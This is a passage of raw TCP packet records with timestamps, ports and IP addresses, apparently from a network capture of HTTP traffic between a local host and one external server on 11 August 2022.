Aug 11, 2022 06:57:07.512465000 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.512489080 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.513961077 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.513978958 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.513995886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.514015913 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.514019012 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.514035940 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.514069080 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.514110088 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.520276070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.520296097 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.520313025 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.520353079 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.520378113 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.521301985 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.521327019 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.521336079 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.521354914 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.521358967 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.521373987 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.521394968 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.521414995 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.521421909 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.521434069 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.521452904 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.521481991 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.521503925 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.524983883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.525011063 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.525041103 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.525075912 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.525162935 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.525187016 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.525209904 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.525213957 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.525235891 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.525255919 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.525275946 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.525300026 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.525325060 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.525326014 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.525361061 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.525392056 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.525425911 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.525435925 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.528156042 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.528247118 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.529190063 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.529215097 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.529238939 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.529247999 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.529258966 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.529264927 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.529284954 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.529289961 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.529297113 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.529315948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.529340982 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.529344082 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.529366016 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.529366970 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.529385090 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.529401064 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.529696941 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.529721975 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.529746056 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.529753923 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.529767990 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.529769897 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.529793024 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.529795885 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.529808998 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.529822111 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.529843092 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.529849052 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.529861927 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.529874086 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.529896021 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.529906988 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.530230045 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.530261993 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.530271053 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.530288935 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.530293941 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.530318975 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.530343056 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.530350924 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.530360937 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.530366898 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.530391932 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.530402899 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.530416012 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.530436993 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.530731916 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.530767918 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.530790091 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.530795097 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.530807018 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.530814886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.530824900 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.530839920 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.530863047 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.530867100 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.530879974 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.530888081 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.530909061 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.530911922 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.530931950 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.530949116 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.531280994 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.531305075 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.531328917 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.531336069 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.531351089 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.531375885 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.531378984 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.531404972 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.531429052 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.531430006 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.531450987 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.531455994 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.531470060 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.531497955 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.534532070 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.534759045 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.536562920 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.536597013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.536628962 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.536631107 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.536663055 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.536674023 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.536695004 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.536719084 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.536729097 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.536735058 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.536761045 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.536784887 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.536793947 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.536803961 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.536828041 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.536843061 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.536859989 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.536870956 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.536892891 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.536914110 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.536927938 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.536936045 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.536959887 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.536983013 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.537003994 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.537201881 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.537396908 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.542838097 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.542874098 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.542901993 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.542910099 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.542929888 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.542942047 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.542954922 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.542977095 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.542998075 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.543009996 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.543016911 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.543071985 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.543370008 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.543418884 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.543443918 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.543458939 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.543462992 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.543497086 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.543512106 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.543534994 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.543540955 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.543576002 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.543591022 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.543622971 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.546528101 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.546567917 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.546601057 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.546608925 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.546619892 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.546648979 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.546664000 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.546688080 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.546694040 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.546729088 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.546744108 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.546773911 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.547013998 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.547053099 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.547064066 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.547092915 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.547103882 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.547132969 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.547142029 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.547172070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.547184944 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.547210932 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.547223091 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.547264099 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.550355911 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550386906 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550409079 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550432920 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550438881 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.550456047 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550476074 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550497055 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550498009 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.550508022 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.550518036 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550542116 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550544977 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.550563097 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550582886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550595045 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.550604105 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550607920 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.550626993 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550633907 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.550659895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550667048 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.550681114 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550694942 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.550703049 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550719023 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.550724030 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550745964 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550750017 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.550775051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550795078 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550795078 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.550817013 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.550817013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550843000 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550863981 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550873995 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.550887108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550906897 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.550909996 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550930977 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550941944 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.550951958 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550975084 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.550976992 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.550997019 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551002979 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551018953 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551040888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551059961 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551060915 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551083088 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551103115 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551103115 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551126957 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551131010 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551147938 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551151037 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551170111 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551191092 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551196098 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551208973 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551212072 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551234961 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551239967 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551258087 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551278114 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551282883 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551301003 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551306009 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551321983 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551342010 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551347971 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551378965 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551381111 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551403046 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551407099 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551424980 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551444054 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551462889 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551484108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551492929 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551506042 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551517010 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551527023 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551549911 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551563025 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551573038 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551583052 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551594973 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551615000 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551623106 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551635981 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551645994 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551656008 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551676989 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551677942 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551697969 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551711082 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551721096 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551740885 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551743031 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551764011 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551774979 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551784992 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551805973 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551816940 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551827908 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551837921 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551848888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551870108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551877022 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551891088 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551899910 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551913977 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551934004 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551944017 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551954985 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551966906 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.551975965 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.551995039 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552010059 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552016020 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552035093 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552037001 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552057981 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552078962 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552078962 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552099943 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552110910 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552120924 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552131891 CEST	49736	80	192.168.2.3	89.208.103.4
